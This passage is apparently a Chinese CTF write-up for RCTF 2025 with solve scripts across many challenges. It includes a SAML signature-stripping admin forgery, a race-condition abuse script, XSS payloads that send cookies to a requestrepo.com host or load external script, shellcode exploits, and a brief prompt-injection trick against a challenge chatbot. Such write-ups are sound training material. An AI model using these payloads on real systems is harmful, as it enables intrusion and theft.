1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 import base64import randomimport reimport stringimport sysimport urllib.requestimport urllib.parseimport http.cookiejarIDP_BASE = "http://auth.rctf.rois.team" SP_BASE = "http://auth-flag.rctf.rois.team:26000" def make_opener (): cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) opener.addheaders = [("User-Agent" , "Mozilla/5.0 (saml-exploit)" )] return opener def random_string (length=8 ): return "" .join(random.choice(string.ascii_lowercase) for _ in range (length)) def register_invited_user (opener, username, email, password ): data = urllib.parse.urlencode( { "type" : "0x10" , "invitationCode" : "" , "username" : username, "email" : email, "password" : password, "confirmPassword" : password, "displayName" : username, "department" : "IT" , } ).encode() url = f"{IDP_BASE} /register" resp = opener.open (url, data=data, timeout=10 ) body = resp.read().decode("utf-8" , errors="ignore" ) print ("[+] Register status:" , resp.getcode(), "URL:" , resp.geturl()) if "User Registration" in body and "alert-error" in body: print ("[!] Registration appears to have failed" ) print (body[:300 ]) return False return True def login (opener, username, password ): data = urllib.parse.urlencode( { "username" : username, "password" : password, } ).encode() url = f"{IDP_BASE} /login" resp = opener.open (url, data=data, timeout=10 ) body = resp.read().decode("utf-8" , errors="ignore" ) print ("[+] Login status:" , resp.getcode(), "URL:" , resp.geturl()) if "Invalid username or password" in body: print ("[!] Login failed" ) return False return True def get_legit_saml_response (opener ): url = f"{IDP_BASE} /saml/idp/Flag" resp = opener.open (url, timeout=10 ) html = resp.read().decode("utf-8" , errors="ignore" ) print ("[+] IdP-initiated SSO status:" , resp.getcode(), "URL:" , resp.geturl()) if "Access Denied" in html or "do not have permission" in html: print ("[!] No permission to access SAML service" ) print (html[:300 ]) return None m = re.search(r'name="SAMLResponse"\s+value="([^"]+)"' , html) if not m: print ("[!] Could not find SAMLResponse in HTML. Snippet:" ) print (html[:500 ]) return None saml_response = m.group(1 ) print ("[+] Extracted SAMLResponse length:" , len (saml_response)) return saml_response def build_malicious_saml_response (orig_b64 ): try : xml = base64.b64decode(orig_b64).decode("utf-8" , errors="ignore" ) except Exception as e: print ("[!] Failed to decode original SAMLResponse:" , e) return None start = xml.find("<saml:Assertion" ) if start == -1 : print ("[!] No <saml:Assertion> found in SAML response" ) return None end = xml.find("</saml:Assertion>" , start) if end == -1 : print ("[!] Unterminated <saml:Assertion>" ) return None end += len ("</saml:Assertion>" ) assertion_xml = xml[start:end] assertion_no_sig = re.sub( r"<ds:Signature.*?</ds:Signature>" , "" , assertion_xml, flags=re.S, ) assertion_admin = re.sub( r"(<saml:NameID[^>]*>)(.*?)(</saml:NameID>)" , r"\1admin@rois.team\3" , assertion_no_sig, count=1 , flags=re.S, ) assertion_admin = re.sub(r'\sID="[^"]+"' , "" , assertion_admin, count=1 ) manipulated_xml = xml[:start] + assertion_admin + xml[start:] new_b64 = base64.b64encode(manipulated_xml.encode("utf-8" )).decode("ascii" ) return new_b64 def send_to_sp (saml_response_b64 ): opener_sp = make_opener() data = urllib.parse.urlencode( { "SAMLResponse" : saml_response_b64, } ).encode() url = f"{SP_BASE} /saml/acs" resp = opener_sp.open (url, data=data, timeout=10 ) body = resp.read().decode("utf-8" , errors="ignore" ) final_url = resp.geturl() print ("[+] Final URL after ACS:" , final_url) print ("[+] Response body (first 500 chars):" ) print (body[:500 ]) m_flag = re.search(r"(RCTF\\{[^}]+\\})" , body) if m_flag: print ("[+] FLAG:" , m_flag.group(1 )) else : print ("[!] FLAG pattern not found in response" ) def main (): username = "evil_" + random_string() email = f"{username} @example.com" password = "Password123!" print ("[*] Using username:" , username) opener = make_opener() if not register_invited_user(opener, username, email, password): return 1 opener = make_opener() if not login(opener, username, password): return 1 legit_b64 = get_legit_saml_response(opener) if not legit_b64: return 1 evil_b64 = build_malicious_saml_response(legit_b64) if not evil_b64: return 1 print ("[+] Built malicious SAMLResponse, length:" , len (evil_b64)) send_to_sp(evil_b64) return 0 if __name__ == "__main__" : sys.exit(main())
UltimateFreeloader 把附件给的 jar 包反编译一下,分析一下源码可以看到这是一个基于 Spring Boot 的电商购物系统后端应用,然后有很多的功能模块,/api/flag/get 接口用于返回flag,但是有很多限制:
用户已认证(有效的JWT token)
购买并完成(状态为 COMPLETED)以下4个商品:
Little Potato(小土豆)- 5.50
Sweet Potato(地瓜)- 8.80
Fish Fish(鱼)- 4.20
Large Potato(大土豆)- 10.00
用户余额必须等于 10.00(不能低于10)
用户必须有一个未使用的优惠券
如果我们注册一个用户,我们的初始余额是10元,然后默认有一个 10.00 的优惠券,分析整个题目,从揣摩出题人的角度可以看出来,这个题的目标应该是想让我们零元购商品,毕竟最后的要求是我们的余额还是10,所以肯定不是想找个什么办法刷钱啥的,而是要求我们在保留优惠券的情况下零元购所有商品
再看代码可以发现项目里有一个redis锁,创建订单的时候有一个锁防止我们同时创建多个订单,退款的时候有一个锁防止我们重复退款。用户其实一共就只能进行两个操作,一个是创建订单(可以选择使用优惠券),另一个是退款,既然没法在创建订单时并发做竞争,也没法在退款时并发做竞争,唯一可行的方法就是在创建订单和退款之间并发做竞争了。
想要在退款和创建订单之间做竞争,前提肯定是现在我们有一个购买成功的订单,有了这个订单之后我们才能退款,然后再想办法再创建订单,因为用户的钱是有限的,只有10元,要是不使用优惠券比如买了 Large Potato 之后就没钱买其他东西了,所以退款订单和创建订单二者之间必然有一个订单是通过优惠券创建的。
这里再思考这两个订单是哪个订单是用优惠券创建的,假设创建订单用优惠券创建,退款订单是直接花钱买的,即使我们竞争成功实现零元购也没意义,用优惠券创建订单本来就不用花钱,而且优惠券也没了,所以唯一的可能就是退款订单是用优惠券创建的,创建订单是直接花钱买的,说不定还有奇迹发生,能通过某种神奇的方式利用竞争免费创建订单。
先头脑风暴一下大概的思路,然后仔细分析一下这一块的代码,先看到创建订单这里,过程大概就是先对购买操作上锁,然后校验用户和商品,接着计算价格,如果优惠券金额大于商品价格,最终价格会被置为 0,最后检查余额是否能支付这个最终价格。
代码这里看起来没什么问题,后面就是数据库这边的操作了,会先用this.orderMapper.insert(order): 在订单表 orders 中插入一条新的订单记录,接着用 BigDecimal newBalance = user.getBalance().subtract(finalPrice);计算一个新余额,最后用this.userService.updateBalance(userId, newBalance)把新余额写入用户的账户,这里的逻辑其实就非常的奇怪了,正常的代码逻辑应该是对数据库里的余额做加减,这里却是算出一个新余额后替换数据库里的余额,并且还没上锁,一看就很可疑的样子。
然后再看到退款这边的逻辑,可以看到差不多,先用加法算一下当前的余额加上退款后的值得到一个新余额,然后用this.userService.updateBalance把用户的余额替换成新余额的值。
所以之前的思路确实是没问题的,就是要在退款订单和创建订单之间并发做竞争,假设退款订单的顺序是1.检查订单是否合法2.将余额替换成10(假设退款后的余额应该是10),创建订单的顺序是3.检查订单是否合法4.将余额替换成0(假设购买后的余额应该是0),只要竞争到一个1342的顺序,就能在完成创建订单的所有操作后反而执行到退款订单的操作2,将余额替换成10,这样就成功实现零元购了。
因此思路就是在退款订单(用券)和创建订单(不用券)之间一直并发做条件竞争,直到竞争到某个创建订单是零元购才停,否则一直竞争,最后把四个商品全部零元购,这样就能在不花钱或者优惠券的情况下完成所有订单的购买
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 import randomimport stringimport threadingimport timefrom decimal import Decimalimport requestsBASE_URL = "http://127.0.0.1:8086" TARGET_PRODUCTS = ["Little Potato" , "Sweet Potato" , "Fish Fish" , "Large Potato" ] BASE_PRODUCT_NAME = "Little Potato" SESSION = requests.Session() def api_request (method, path, token=None , **kwargs ): url = BASE_URL + path headers = kwargs.pop("headers" , {}) if token: headers["Authorization" ] = f"Bearer {token} " if "json" in kwargs and "Content-Type" not in headers: headers["Content-Type" ] = "application/json" for _ in range (3 ): try : resp = SESSION.request(method, url, headers=headers, timeout=5 , **kwargs) try : return resp.json() except Exception: return {"code" : resp.status_code, "raw" : resp.text} except Exception: time.sleep(0.2 ) return {"code" : -1 , "error" : "request failed" } def random_username (): return "ctf" + "" .join(random.choices(string.ascii_lowercase + string.digits, k=8 )) def register_user (): while True : username = random_username() email = f"{username} @example.com" body = {"username" : username, "password" : "Pass1234" , "email" : email} data = api_request("POST" , "/api/user/register" , json=body) if data.get("code" ) == 200 and data.get("data" , {}).get("success" ): d = data["data" ] user = d["user" ] print (f"[+] Registered user {username} " ) return user["id" ], d["token" ] else : print ("[-] register failed:" , data) time.sleep(0.5 ) def get_products (token ): data = api_request("GET" , "/api/product/list" , token=token) assert data.get("code" ) == 200 , data products = data["data" ] return {p["name" ]: p["id" ] for p in products} def get_coupon_info (token ): data = api_request("GET" , "/api/coupon/my" , token=token) assert data.get("code" ) == 200 , data coupons = data["data" ] assert coupons return coupons[0 ] def get_user_balance (token ): data = api_request("GET" , "/api/user/info" , token=token) assert data.get("code" ) == 200 , data return Decimal(str (data["data" ]["balance" ])) def get_orders (token ): data = api_request("GET" , "/api/order/my" , token=token) assert data.get("code" ) == 200 , data return data["data" ] def create_order (token, product_id, quantity="1" , coupon_id=None ): body = { "productId" : product_id, "quantity" : quantity, "couponId" : coupon_id, } return api_request("POST" , "/api/order/create" , token=token, json=body) def refund_order (token, order_id ): return api_request("POST" , f"/api/order/refund/{order_id} " , token=token) def ensure_coupon_unused (token, coupon_id ): coupon = get_coupon_info(token) if not coupon["isUsed" ]: return orders = get_orders(token) for o in orders: if o.get("couponId" ) == coupon_id and o["status" ] == "COMPLETED" : print (f" [*] Restoring coupon by refunding order {o['id' ]} " ) refund_order(token, o["id" ]) break coupon = get_coupon_info(token) assert not coupon["isUsed" ] def zero_cost_purchase (token, product_ids, coupon_id, target_name, max_tries=30 ): target_pid = product_ids[target_name] base_pid = product_ids[BASE_PRODUCT_NAME] for attempt in range (1 , max_tries + 1 ): print (f" [*] {target_name} try #{attempt} " ) ensure_coupon_unused(token, coupon_id) base_resp = create_order(token, base_pid, quantity="1" , coupon_id=coupon_id) if base_resp.get("code" ) != 200 or not base_resp.get("data" , {}).get("success" ): print (" [-] base order failed:" , base_resp) time.sleep(0.2 ) continue base_order_id = base_resp["data" ]["order" ]["id" ] create_result = {} refund_result = {} def t_create (): nonlocal create_result create_result = create_order( token, target_pid, quantity="1" , coupon_id=None ) def t_refund (): nonlocal refund_result refund_result = refund_order(token, base_order_id) threads = [threading.Thread(target=t_create), threading.Thread(target=t_refund)] for t in threads: t.start() for t in threads: t.join() balance = get_user_balance(token) target_order_id = None success_create = create_result.get("code" ) == 200 and create_result.get( "data" , {} ).get("success" ) if success_create: target_order_id = create_result["data" ]["order" ]["id" ] orders = get_orders(token) has_target_completed = any ( o["productId" ] == target_pid and o["status" ] == "COMPLETED" for o in orders ) print (f" [*] balance={balance} , target_completed={has_target_completed} " ) if balance == Decimal("10.00" ) and has_target_completed: print (f" [+] Got free COMPLETED order for {target_name} " ) return True if target_order_id: print (f" [*] refund target order {target_order_id} to restore balance" ) refund_order(token, target_order_id) balance_after = get_user_balance(token) print (f" [*] balance after refund={balance_after} " ) if balance_after < Decimal("4.20" ): print (" [-] balance too low after refund, give up this user" ) return False else : if balance < Decimal("4.20" ): print (" [-] balance too low, give up this user" ) return False time.sleep(0.2 ) print (f" [-] Max tries reached for {target_name} , give up on this user." ) return False def conditions_satisfied (token, product_ids, coupon_id ): orders = get_orders(token) balance = get_user_balance(token) coupon = get_coupon_info(token) completed = [o for o in orders if o["status" ] == "COMPLETED" ] completed_pids = {o["productId" ] for o in completed} has_all_products = all (pid in completed_pids for pid in product_ids.values()) has_balance_10 = balance == Decimal("10.00" ) has_unused_coupon = not coupon["isUsed" ] return has_all_products, has_balance_10, has_unused_coupon, orders def get_flag (token ): data = api_request("GET" , "/api/flag/get" , token=token) print ("[+] /api/flag/get:" , data) return data def exploit_once (): user_id, token = register_user() products = get_products(token) for name in TARGET_PRODUCTS: assert name in products, f"product {name} not found" coupon = get_coupon_info(token) coupon_id = coupon["id" ] print ( f"[+] User {user_id} , coupon_id={coupon_id} , balance={get_user_balance(token)} " ) for name in TARGET_PRODUCTS: ok = zero_cost_purchase(token, products, coupon_id, name) if not ok: return False has_all, has_bal10, has_unused, _ = conditions_satisfied(token, products, coupon_id) print ( f"[+] Final check: products={has_all} , balance10={has_bal10} , coupon_unused={has_unused} " ) if has_all and has_bal10 and has_unused: print ("[+] Conditions satisfied, requesting flag..." ) get_flag(token) return True return False if __name__ == "__main__" : for attempt in range (1 , 6 ): print (f"===== Attempt {attempt} =====" ) try : if exploit_once(): break except Exception as e: print (f"[!] Error in attempt {attempt} : {e} " ) time.sleep(0.5 )
因为是条件竞争,所以能不能打出来有点看脸,实现不行刷新靶机多试几次
author 1 2 3 augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled. xss-shield.js:3 blocked! xss-shield.js:517 XSS Shield activated
我们首先要找到绕过xss-shield.js的方法,先寻找一个其他的可控点
查看php源代码发现 htmlspecialchars() 默认不编码单引号
发现属性注入利用点
1 <meta name ="author" content =<?php echo $pageAuthor ; ?> >
可以利用这一点进行任意跳转
1 <meta name ="author" content ="0;url=" http-equiv ="refresh" >
使用恶意用户名插入CSP策略阻止wafjs加载
1 'script-src-elem http://localhost:8081/assets/js/article.js;script-src unsafe-inline' http-equiv='Content-Security-Policy'
bot侧需改为
1 2 3 4 5 http://blog-app augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled. 5278586407747584:1 Refused to load the script 'http://localhost:8081/assets/js/purify.min.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js". 5278586407747584:1 Refused to load the script 'http://localhost:8081/assets/js/xss-shield.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js".
现在成功使用csp,阻止了xss-shield.js,和purify
1 2 3 4 5 6 7 8 <img src =x onerror ="new Image().src='http://cca6vtq5.requestrepo.com/steal?cookie='+encodeURIComponent(document.cookie);" > augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled. 5281336646434816:1 Refused to load the script 'http://localhost:8081/assets/js/purify.min.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js". 5281336646434816:1 Refused to load the script 'http://localhost:8081/assets/js/xss-shield.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js". x:1 GET http://localhost:8081/article/x 404 (Not Found) 5281336646434816:1 Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src unsafe-inline unsafe-hashes". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.
script-src 'unsafe-inline' 才是合法的形式,script-src unsafe-inline是不合法的htmlspecialchars()又会编码",所以我无法正确包裹csp头,使用这种方式加载外部脚本获得flag
1 <iframe srcdoc='<script src="http://{url}/exp.js"></script>'></iframe>
Misc Signin 签
Speak Softly Love 网络取证题
第一问
根据视频的信息,直接在youtube里搜关键词快速定位到了这个视频,答案为8ssDGBTssUI
第二问
视频介绍里,提到了这个项目的网站
进网站可以看到有对应的项目仓库,装个svn的gui工具
访问仓库,可以看到有若干版本
在v0.9里找到soft error相关的记录,发现revision是178,所以答案是r178(gpt告诉我的格式)
第三问
在网站里可以快速定位到作者的个人官网https://mateusz.viste.fr/
在最下面可以找到
答案是https://mateusz.viste.fr/mateusz.ogg
第四问
个人主页里提到了有一个gopher空间,访问进去可以找到捐赠链接
或者直接搜关键词也能看到
Wanna Feel Love 网络取证题
第一问
题目给了个附件 里面是有eml邮件
看了一下邮件内容,一眼垃圾邮件隐写 解隐写拿到
第二问
邮件里有个xm文件 ai分析一波发现要用OpenMPT打开,下个工具
说是要提取feel的信息,切到feel的波形发现明显是转01,黑为0红为1
写脚本提取
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import soundfile as sfimport numpy as npVOLUME_THRESHOLD = 0.3 def rms_volume (segment ): """计算该音频片段的 RMS 平均音量""" return np.sqrt(np.mean(segment ** 2 )) def extract_volume_bits (path ): audio, sr = sf.read(path) if audio.ndim > 1 : audio = audio.mean(axis=1 ) segment_samples = int (0.050 * sr) bits = [] for i in range (0 , len (audio), segment_samples): segment = audio[i:i + segment_samples] if len (segment) < segment_samples: break vol = rms_volume(segment) bit = 1 if vol >= VOLUME_THRESHOLD else 0 bits.append(str (bit)) return "" .join(bits) if __name__ == "__main__" : path = "Feel.flac" bitstring = extract_volume_bits(path) print (bitstring)
得到答案I Feel Fantastic heyheyhey
第三问 通过搜索第二问的答案可以找到这个猎奇小玩意
然后可以gpt梭哈
第四问
继续gpt梭哈,页面也可以自己搜到,不难
同时通过调查可以发现一篇关键文章 https://yitzilitt.medium.com/the-story-behind-i-feel-fantastic-tara-the-singing-android-and-john-bergeron-fc83de9e8f36 里面有我们想要的所有内容
第五问
在关键文章的评论里可以找到
答案为https://www.findagrave.com/memorial/63520325/john-louis-bergeron
Shadows of Asgard 流量分析题
第一问
跟踪第一个http流就看到了
第二问
往后分析,发现这里传了aeskey和iv还有data,说明是aes加密了数据 并且key一直没变
ai搞了个脚本来解密
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 import base64import jsonfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import unpadaesKey_b64 = "WzUsMTM5LDI0NSwyMjAsMjMxLDQ2LDIzNCwxNDYsMjQ4LDIxMSwyLDIxMywyLDE2NSw5OCwxMTgsMTAzLDE2MiwzLDE1MCw0LDUzLDE3OSwxOTQsODQsMjA3LDQ1LDI0NSw4OCwxNzksMTkzLDEwMV0=" aesIV_b64 = "WzEyNCwyMzIsMjU0LDE5LDI1MCw0OSw1MCw4MywyMjksMjQ0LDI4LDIyMiw4MywzMywyMDIsNl0=" data_hex = "6781ed63ff3d0c5a8960573c821f293cf3f59d678671645d40a72c9ed3bbccd29ad40f754ef11b77b033f8338888a30080f7dfb242241bf1fae6e4cd903e3c257457846ece5bb9c190ee9fc367f728daadabfabf929e75c7db7e111a32919c0e" aesKey = bytes (json.loads(base64.b64decode(aesKey_b64))) aesIV = bytes (json.loads(base64.b64decode(aesIV_b64))) ciphertext = bytes .fromhex(data_hex) def try_aes_cbc (key, iv, ct ): try : cipher = AES.new(key, AES.MODE_CBC, iv) pt = cipher.decrypt(ct) return unpad(pt, AES.block_size).decode('utf-8' , errors='replace' ) except Exception: return None def try_aes_ctr (key, iv, ct ): try : cipher = AES.new(key, AES.MODE_CTR, nonce=iv) pt = cipher.decrypt(ct) return pt.decode('utf-8' , errors='replace' ) except Exception: return None print ("=== 尝试 AES-256-CBC ===" )cbc_res = try_aes_cbc(aesKey, aesIV, ciphertext) print (cbc_res if cbc_res else "CBC 解密失败" )print ("\n=== 尝试 AES-256-CTR ===" )ctr_res = try_aes_ctr(aesKey, aesIV, ciphertext) print (ctr_res if ctr_res else "CTR 解密失败" )
解出路径
第三问
一样的解数据,根据描述藏了隐写,同一个流里发现png图片内有base数据
提出来解密就行,得到id
第四问
找数据然后解密
第五问
接着解数据
The Alchemist’s Cage ez提示注入题
进去先输个soul 创建个对象
然后就可以开始在五轮内进行注入攻击了,很简单的,随便让它爆爆就出来了,这里是让它重复上一轮回复,当出现指定关键词(这里是谎言),输出关键字符串
Asgard Fallen Down 流量分析题
Challenge 1: The First Command
干扰的流量太多,不太好找
在流207中发现类似连接成功的流量
解码看看,看到了熟悉的进程
同时我们注意到,响应包中有三个奇怪的base64字符串
解码看一下,发现第一个长度是32,第二个是16,猜测为AES的key和iv
继续往后看,在之后紧跟着的包中看到,一串神秘的base64
使用之前得到的密钥和iv可以成功解密
得到命令spawn whoami
然后在之后的
得到命令执行结果
Challenge 2: The Heartbeat
很明显之前的命令执行过程含有心跳包机制,在207流中很明显看到时间间隔是10s
Challenge 3: The Heart of Iron
继续解密即可
找到响应包解密
得到答案Intel64 Family 6 Model 191 Stepping 2, GenuineIntel
Challenge 4: Odin’s Eye
搜索关键词build:20251115可在2787流中找到本题的执行命令
发现之后有很多大块的响应包,猜测是可能图片base64后太大一次不好传输于是分段传输
正则匹配,解密
不知道为啥cbc没解出来,cbcnopadding出了
解密result
得到图片,工具是TscanPlus
vault 丢给ai分析大概知道是要用sui环境去编译然后运行程序跟靶机进行交互
去下个预编译好的程序,然后就可以跑了
关键在代码
但是不懂区块链只能让ai帮忙做,换了两轮ai,gpt和gemini都怪怪的,最后用claude梭出来了
改了客户端的vault.move 然后修改Move.toml和Solve.move拿到了flag
https://claude.ai/share/87c74de4-00d5-4ac9-bfce-a8faecb24525
1 module solution::solution { use sui::coin::{Self, TreasuryCap}; use sui::tx_context::TxContext; use challenge::vault::{Self, Vault, AirdropTracker}; use challenge::vault_coin::VAULT_COIN; public fun solve ( vault: &mut Vault, tracker: &mut AirdropTracker, treasury: &mut TreasuryCap<VAULT_COIN>, ctx: &mut TxContext ) { vault::request_airdrop (tracker, treasury, ctx); let proof_coin = coin::mint (treasury, 100 _000_000_000, ctx); vault::buy_flag (tracker, vault, proof_coin, ctx); } }
Pwn only 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 from pwn import *s = lambda x : io.send(x) sa = lambda x,y : io.sendafter(x,y) sl = lambda x : io.sendline(x) sla = lambda x,y : io.sendlineafter(x,y) r = lambda x : io.recv(x) ru = lambda x : io.recvuntil(x) rl = lambda : io.recvline() itr = lambda : io.interactive() uu32 = lambda x : u32(x.ljust(4 ,b'\x00' )) uu64 = lambda x : u64(x.ljust(8 ,b'\x00' )) ls = lambda x : log.success(x) lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval (x))) attack = '101.245.98.115 26100' .replace(' ' ,':' ) binary = './chal' def start (argv=[], *a, **kw ): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':' ),ssl=True ) if args.REM:return remote(*attack.split(':' )) return process([binary] + argv, *a, **kw) context(binary = binary, log_level = 'debug' , terminal='tmux splitw -h -l 170' .split(' ' )) gdbscript = ''' brva 0x001A40 brva 0x001A32 #continue ''' .format (**locals ())io = start([]) def notes (): ru('exit\n' ) sl('1' ) def add (size ): ru('back\n' ) sl('1' ) ru('size:' ) sl(str (size)) def rm (): ru('back\n' ) sl('2' ) def save (fn ): ru('back\n' ) sl('3' ) def edit (text ): ru('back\n' ) sl('4' ) ru('asdf' ) import structdef li2double (bt ): float_value = struct.unpack('!d' , bt)[0 ] return float_value v = li2double(p64(0xD0E0A0D0B0E0E0F )[::-1 ]) gdb.attach(io,gdbscript=gdbscript) ru('exit\n' ) sl('2' ) ru('input:\n' ) sl(str (v)) sc = ''' pop rsi pop rsi pop rdx pop rsi pop rsi pop rsi syscall ''' sc = asm(sc) ru(b'Make a choice:' ) sl('1' ) ru('your code:' ) sl(sc) sleep(0.1 ) pay = b'\x90' * 0x40 + asm(shellcraft.cat('flag' )) sl(pay) itr()
only_rev Shellcode 改一下就行了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 sc = ''' syscall xchg rcx,rsi mov edx,esi syscall ''' sc = asm(sc) ru(b'Make a choice:' ) sl('1' ) ru('your code:' ) s(sc) sleep(0.1 ) pay = b'\x90' * 0x40 +asm('mov rsp,rsi' )+ asm(shellcraft.cat('flag' )) sl(pay)
no_check_WASM 赛后复现:https://flyyy.top/2025/11/17/rctf-2025-no_check_WASM/
Crypto SuanP01y GPT一把梭版本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 from sage.all import *from hashlib import md5from Crypto.Cipher import AESr, d = 16381 , 41 R.<x> = PolynomialRing(GF(2 )) S.<X> = R.quo(x^r - 1 ) m = x^r - 1 def hwt (p ): return len (p.exponents()) def min_arc_len (exps, n=r ): """ minimal cyclic interval length covering all exponents on Z_n """ if not exps: return 0 exps = sorted (e % n for e in exps) gaps = [ (exps[(i+1 )%len (exps)] - exps[i]) % n for i in range (len (exps)) ] return n - max (gaps) def in_window (p, lim=r//3 ): return min_arc_len(p.exponents(), r) <= lim def rotate_R (p, s ): s %= r return R((S(p) * (X**s)).lift()) def try_reconstruct_once (qR ): r0, r1 = m, qR s0, s1 = R(1 ), R(0 ) t0, t1 = R(0 ), R(1 ) while r1 != 0 : qout, rem = r0.quo_rem(r1) r0, r1 = r1, rem s0, s1 = s1, s0 - qout*s1 t0, t1 = t1, t0 - qout*t1 A, B = r0, t0 if hwt(A) == d and hwt(B) == d and in_window(A) and in_window(B): U = R((S(qR) * S(B)).lift()) if hwt(U) == d and A != 0 and U != 0 : Delta = (U.exponents()[0 ] - A.exponents()[0 ]) % r if rotate_R(A, Delta) == U: return A, B, Delta U2 = R((S(qR) * S(A)).lift()) if hwt(U2) == d and B != 0 and U2 != 0 : Delta = (U2.exponents()[0 ] - B.exponents()[0 ]) % r if rotate_R(B, Delta) == U2: return B, A, Delta return None def rational_reconstruct (qR ): res = try_reconstruct_once(qR) if res is not None : return res shift = r//3 + 1 qR_shift = rotate_R(qR, shift) res = try_reconstruct_once(qR_shift) if res is None : raise RuntimeError("Rational reconstruction failed (unexpected)." ) A, B, Delta = res A = rotate_R(A, r - shift) return A, B, Delta hint_line, ct_hex = open ("output.txt" ,"r" ).read().splitlines() hint_str = hint_line.split("=" ,1 )[1 ].strip() qS = S(hint_str) qR = R(qS.lift()) C = bytes .fromhex(ct_hex.strip()) A, B, Delta = rational_reconstruct(qR) assert gcd(B, m) == 1 for k0 in range (r): h0 = S(B) * (X**k0) key = md5(str (h0).encode()).digest() pt = AES.new(key=key, mode=AES.MODE_CTR, nonce=b"suanp01y" ).decrypt(C) if pt.startswith(b"RCTF{" ) and pt.endswith(b"}" ): print ("flag =" , pt.decode()) print ("k0 =" , k0) break
SuanHash 通过短消息学习状态差 Δs₁,再用 Δs₁ 补偿第二块,使两条长消息在最后一块完全一致,从而构造确定性哈希碰撞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 from pwn import *import osHOST = "1.14.196.78" PORT = 42103 context.log_level = "info" def pad_block_of_short_msg (m: bytes ) -> bytes : """ 对长度 <= 15B 的短消息,返回其"首块"(16B): data = m + 0x80 + 0填充至16字节;只取这16字节。 """ assert len (m) <= 15 return m + b"\x80" + b"\x00" * (16 - len (m) - 1 ) def b2i (b: bytes ) -> int : return int .from_bytes(b, "big" ) def i2b128 (x: int ) -> bytes : return x.to_bytes(16 , "big" ) def xor_bytes (a: bytes , b: bytes ) -> bytes : return bytes (x ^ y for x, y in zip (a, b)) def recv_prompt (io, prompt=b"(hex): " , timeout=20 ): """稳妥等待输入提示 '(hex): ',避免卡死""" io.recvuntil(prompt, timeout=timeout) def send_hex_get_H (io, raw: bytes ) -> bytes : """发送 raw(以hex),并解析返回的 'H = ...' 为 bytes""" 